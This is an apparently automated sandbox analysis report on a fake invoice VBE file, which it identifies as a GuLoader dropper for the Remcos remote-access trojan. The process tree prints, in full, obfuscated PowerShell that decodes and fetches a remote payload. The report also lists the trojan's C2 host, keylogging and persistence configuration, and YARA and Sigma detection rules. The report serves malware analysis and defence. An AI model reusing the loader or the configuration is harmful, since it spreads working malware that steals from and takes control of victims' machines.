Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Faktura_82666410_1361590461#U00b7pdf.vbe

Overview

General Information

Sample name:Faktura_82666410_1361590461#U00b7pdf.vbe
renamed because original name is a hash value
Original sample name:Faktura_82666410_1361590461pdf.vbe
Analysis ID:1522517
MD5:f1a0355012d13febdfb56ee8d2b38012
SHA1:38fb764e45b496b63b7a49713fac2b411cfc524b
SHA256:670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b
Tags:vbeuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6472 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5728 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5376 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 6896 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2452849140.00000000046BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000006.00000002.2494284509.00000000085E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000006.00000002.2481228299.0000000005A0D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000006.00000002.2494560682.0000000008EC2000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_3020.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_3020.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10197:$b2: ::FromBase64String(
              • 0xd4f1:$s1: -join
              • 0x6c9d:$s4: +=
              • 0x6d5f:$s4: +=
              • 0xaf86:$s4: +=
              • 0xd0a3:$s4: +=
              • 0xd38d:$s4: +=
              • 0xd4d3:$s4: +=
              • 0xf899:$s4: +=
              • 0xf919:$s4: +=
              • 0xf9df:$s4: +=
              • 0xfa5f:$s4: +=
              • 0xfc35:$s4: +=
              • 0xfcb9:$s4: +=
              • 0xdd31:$e4: Get-WmiObject
              • 0xdf20:$e4: Get-Process
              • 0xdf78:$e4: Start-Process
              amsi32_5728.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xad28:$b2: ::FromBase64String(
              • 0x9d89:$s1: -join
              • 0x3535:$s4: +=
              • 0x35f7:$s4: +=
              • 0x781e:$s4: +=
              • 0x993b:$s4: +=
              • 0x9c25:$s4: +=
              • 0x9d6b:$s4: +=
              • 0x13ecb:$s4: +=
              • 0x13f4b:$s4: +=
              • 0x14011:$s4: +=
              • 0x14091:$s4: +=
              • 0x14267:$s4: +=
              • 0x142eb:$s4: +=
              • 0xa5c9:$e4: Get-WmiObject
              • 0xa7b8:$e4: Get-Process
              • 0xa810:$e4: Start-Process
              • 0x14bc1:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe", ProcessId: 6472, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.142, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5376, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51425
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe", ProcessId: 6472, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff 